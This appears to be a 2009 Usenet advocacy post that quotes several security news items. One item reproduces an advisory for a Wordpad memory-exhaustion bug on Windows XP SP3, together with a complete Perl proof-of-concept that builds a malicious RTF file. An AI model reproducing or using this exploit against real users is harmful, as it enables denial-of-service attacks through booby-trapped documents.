
[News] [Rival] Windows Ind-secure by Design (Deal with it), Wordpad.exe Under Attack

  • Subject: [News] [Rival] Windows Ind-secure by Design (Deal with it), Wordpad.exe Under Attack
  • From: Roy Schestowitz <newsgroups@xxxxxxxxxxxxxxx>
  • Date: Thu, 13 Aug 2009 22:37:16 +0000
  • Newsgroups: comp.os.linux.advocacy
  • User-agent: KNode/0.10.9

Security is a process

,----[ Quote ]
| I often point out that Windows is insecure. It's so insecure, in fact, that
| I, in all seriousness, propose that ISPs (Internet Service Providers) should
| start forcing users to secure Windows - since neither users nor Microsoft will
| do the job, Windows PCs should be banned from the Internet. That said,
| nothing, and I mean nothing, is really secure.
| 
| [...]
| 
| It doesn't work that way. Security is a process, it's not a product. Some 
| systems are more secure than others. Linux, as anyone who pays any attention 
| to security news knows, is a lot more secure than Windows. If we were talking 
| cars, Linux would be an Audi A4, the Mac, BMW 330 and Windows would be a 
| mid-70s Ford "Hit here to blow up" Pinto.    
`----

http://www.itworld.com/security/74446/security-process

Virus arms race primes malware numbers surge

,----[ Quote ]
| The amount of catalogued malware by Panda was 18 million in the 20 years from 
| the firm's foundation until the end of 2008. This figure increased 60 per 
| cent in just seven months to reach 30 million by 31 July 2009.  
`----

http://www.theregister.co.uk/2009/08/13/malware_arms_race/

http://www.hellcode.net/wordpad.txt

,----[ Quote ]
| Affected Software: 
| Microsoft Wordpad on Windows XP SP3
| 
| Description of Vulnerability:
| Microsoft Wordpad (on Windows XP SP3) contains a vulnerability that can allow 
| an attacker to cause a denial of service.  
| The vulnerability is due to a memory exhaustion error when a user tries to 
| view a malicious .RTF file.  
| An attacker can exploit the vulnerability by creating a malicious RTF file 
| that will allocate large amounts of  
| memory and cause a denial of service condition.
| 
| Vulnerable version:
| Windows XP SP3
| 
| Platform:
| Windows XP SP3
| 
| Solution:
| There is not a patch. Do not open untrusted files.
| 
| Credits:
| Discovered by murderkey, Hellcode Research.
| http://tcc.hellcode.net
| 
| Exploit:
| 
| #!/usr/bin/perl
| #Microsoft Wordpad on WinXP SP3 Memory Exhaustion Vulnerability - 0day
| #Works on WinXP SP3!
| #bug found by murderkey in Hellcode Labs.
| #exploit coded by karak0rsan aka musashi from Hellcode Labs
| #Hellcode Research | TCC
| #http://tcc.hellcode.net
| #just a fuckin' lame 0day bug for fun!
| 
| $file = "hellcoded.rtf";
| $header = 
| "\x7b\x5c\x72\x74\x66\x31\x5c\x61\x6e\x73\x69\x5c\x61\x6e\x73\x69\x63\x70\x67\x31\x32". 
| "\x35\x34\x5c\x64\x65\x66\x66\x30\x5c\x64\x65\x66\x6c\x61\x6e\x67\x31\x30\x35\x35\x7b".
| "\x5c\x66\x6f\x6e\x74\x74\x62\x6c\x7b\x5c\x66\x30\x5c\x66\x73\x77\x69\x73\x73\x5c\x66".
| "\x63\x68\x61\x72\x73\x65\x74\x31\x36\x32\x7b\x5c\x2a\x5c\x66\x6e\x61\x6d\x65\x20\x41".
| "\x72\x69\x61\x6c\x3b\x7d\x41\x72\x69\x61\x6c\x20\x54\x55\x52\x3b\x7d\x7d\x0a\x7b\x5c".
| "\x2a\x5c\x67\x65\x6e\x65\x72\x61\x74\x6f\x72\x20\x4d\x73\x66\x74\x65\x64\x69\x74\x20".
| "\x35\x2e\x34\x31\x2e\x31\x35\x2e\x31\x35\x31\x35\x3b\x7d\x5c\x76\x69\x65\x77\x6b\x69".
| "\x6e\x64\x34\x5c\x75\x63\x31\x5c\x70\x61\x72\x64\x5c\x66\x30\x5c\x66\x73\x32\x30";
| 
| $subheader = "\x5c\x41\x41\x41\x41\x41\x5c\x41\x41\x41\x41\x5c\x70\x61\x72\x0a\x7d\x0a\x00";
| $ekheader = "\x5c\x70\x61\x72\x0a";
| $buffer = "A" x 578001;
| $buffer2 = "A" x 289000;
| $buffer3 = "A" x 18186;
| $buffer4 = "A" x 863973;
| $buffer5= "A" x 578000;
| $memory = $header.$buffer.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.
| $buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.
| $buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.
| $buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.
| $buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.
| $buffer4.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.
| $buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.
| $buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.
| $buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.
| $buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.
| $ekheader.$buffer5.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.
| $ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.
| $ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.
| $ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer3.
| $subheader;              
|     open(file, '>' . $file);
|     print file $memory;
|     close(file);
| print "File PoC exploit has created!\n"; 
| exit();
`----


Recent:

Benign security warnings have trained users to ignore them

,----[ Quote ]
| It should come as no surprise that most Internet users ignore security
| certificate warnings, but a new study examines just how severe this behavior
| is and why people do it. Hint: it's because legit websites cry wolf with SSL
| warnings on a regular basis.
`----

http://arstechnica.com/security/news/2009/07/benign-security-warnings-have-trained-users-to-ignore-them.ars


AVG temporarily blocked iTunes, labeling it malware

,----[ Quote ]
| AVG's free antivirus product temporarily blocked users from getting to iTunes
| late last week, detecting it as a Trojan, the company said on Monday.
|
| For about five hours on Friday starting around 4 p.m. PDT, AVG users couldn't
| access iTunes because of the false alarm.
`----

http://news.cnet.com/8301-27080_3-10296755-245.html


Report finds fake antivirus on the rise

,----[ Quote ]
| PandaLabs found 1,000 samples of fake antivirus software in the first quarter
| of 2008. In a year, that number had grown to 111,000. And in the second
| quarter of 2009, it reached 374,000, Luis Corrons, technical director of
| PandaLabs said in a recent interview.
`----

http://news.cnet.com/8301-27080_3-10298253-245.html


Are we too naive by believing that GNU/Linux is more secure by design?

,----[ Quote ]
| Now, there are people that say that it's just that GNU/Linux is less
| attractive to malware software because there are so few of us GNU/Linux
| users. I have always thought that this is crap but anyway....
|
| Now, think about the things that FLOSS developers get to do:
| - Crack encrypted DVDs
| - Allow for communication between Microsoft Windows hosts (with a twisted SMB
| protocol) and *NIX hosts before Microsoft (reluctantly... but with a lot of
| PR spin, as usual) released the documentation about it
| - Synchronize with iTunes
| - Running GNU/Linux on basically any piece of equipment worthy of running it
| (with or without support by the vendor).. and some others that aren't worthy
| but....
| - Break every DRM mechanism ever built
`----

http://maratux.blogspot.com/2009/07/are-we-too-naive-by-believing-that.html